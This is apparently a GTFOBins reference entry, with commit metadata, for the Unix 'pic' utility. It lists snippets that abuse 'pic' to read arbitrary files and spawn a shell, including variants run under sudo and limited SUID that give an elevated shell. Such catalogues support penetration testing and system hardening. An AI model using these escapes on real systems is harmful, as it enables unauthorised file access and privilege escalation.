GTFOBins.github.io/_gtfobins/pic.md
LinuxSploit dab2e88a30
Add pic file-read
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-06-23 08:57:40 +02:00

24 lines
384 B
Markdown

---
functions:
file-read:
- description: The output is prefixed with a some content as a header.
code: |
LFILE=file_to_read
pic $LFILE
shell:
- code: |
pic -U
.PS
sh X sh X
sudo:
- code: |
sudo pic -U
.PS
sh X sh X
limited-suid:
- code: |
./pic -U
.PS
sh X sh X
---